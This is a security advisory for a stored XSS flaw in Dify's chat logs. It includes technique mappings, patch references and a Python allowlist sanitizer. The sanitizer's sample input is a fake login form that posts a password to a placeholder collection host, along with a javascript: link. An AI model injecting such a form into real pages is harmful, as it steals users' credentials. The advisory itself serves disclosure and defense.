CVE-2024-11824
Published: 20 March 2025
Description
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service.
Security Summary
CVE-2024-11824 is a stored cross-site scripting (XSS) vulnerability in the langgenius/dify application, specifically within its chat log functionality. The flaw affects the latest release prior to the patch and occurs because certain HTML tags, such as <input> and <form>, are not disallowed when chat content is rendered. This allows attackers to inject malicious HTML into chat logs via prompts. The vulnerability carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N) and maps to CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').
A low-privileged user (PR:L) can exploit the vulnerability by submitting prompts containing malicious HTML, which becomes stored in the chat log. When an administrator views the tainted log, the injected script executes in the admin's browser context due to insufficient sanitization, enabling the attacker to steal the admin's credentials or other sensitive information. Exploitation requires network access and user interaction from the victim (UI:R), but achieves high confidentiality impact with changed scope (S:C).
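The sanitization gap described above, as an added example that is not Dify's code or the fix in the referenced commit: an allowlist HTML sanitizer of the kind a defender places in front of chat-log rendering, shown beside the weak denylist approach that strips only <script> and therefore lets <form> and <input> through. The tag and attribute allowlists, the helper names, and the tainted prompt are constructed for illustration and are not taken from the project.

```python
"""Allowlist vs. denylist sanitization of user-supplied chat-log HTML.

Added example, not Dify's code. ALLOWED_TAGS, ALLOWED_ATTRS and the
helper names below are assumptions chosen for illustration.
"""
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlist: formatting a chat transcript legitimately needs.
# <form>, <input>, <script>, <iframe> etc. are absent, so they are dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "code", "pre",
                "ul", "ol", "li", "a"}
# Attributes kept per tag; <a> keeps href only when the scheme is http(s).
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment keeping only allowlisted tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitized output pieces
        self.dropped = []  # tags removed, useful for logging/alerting

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = value or ""
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue  # blocks javascript:, data: and relative tricks
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text nodes are re-escaped so decoded entities cannot form new tags.
        self.out.append(escape(data, quote=False))


def sanitize_allowlist(fragment):
    """Return (clean_html, sorted list of tag names that were dropped)."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), sorted(set(parser.dropped))


# The weak approach: a denylist that only removes <script>.
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def sanitize_denylist(fragment):
    """Strips <script> only; <form>/<input> survive, which is the CVE's gap."""
    return SCRIPT_TAG.sub("", fragment)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)

    def handle_startendtag(self, tag, attrs):
        self.tags.add(tag)


def disallowed_tags_present(fragment):
    """Detection check: tag names in the fragment that are not allowlisted."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return sorted(collector.tags - ALLOWED_TAGS)


# Constructed sample of a stored chat-log entry containing a fake login form.
TAINTED_PROMPT = (
    'Hello <b>admin</b>, please re-authenticate: '
    '<form action="https://example.invalid/collect">'
    '<input type="password" name="pw"></form>'
    '<a href="javascript:void(0)">help</a>'
)

if __name__ == "__main__":
    print("denylist :", sanitize_denylist(TAINTED_PROMPT))
    clean, dropped = sanitize_allowlist(TAINTED_PROMPT)
    print("allowlist:", clean, "| dropped:", dropped)
```

The allowlist rewrite is the one to run on the server before a log entry is stored or rendered; the `dropped` list doubles as a detection signal, since a prompt that tries to introduce `<form>` or `<input>` into a transcript is itself worth alerting on.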
The issue is addressed in Dify version 0.12.1, with the fix implemented in commit 55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d available at https://github.com/langgenius/dify/commit/55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d. Security teams should prioritize upgrading to the patched version. Further details, including the original report, are provided in the Huntr bounty advisory at https://huntr.com/bounties/72387deb-6e64-48ed-a8c3-b50d22a0970f.
Details
Why these techniques?
Stored XSS in the web application enables exploitation of a public-facing application (T1190), and the injected content acts as web portal capture (T1056.003), stealing credentials or other sensitive data from the administrator who views the tainted logs.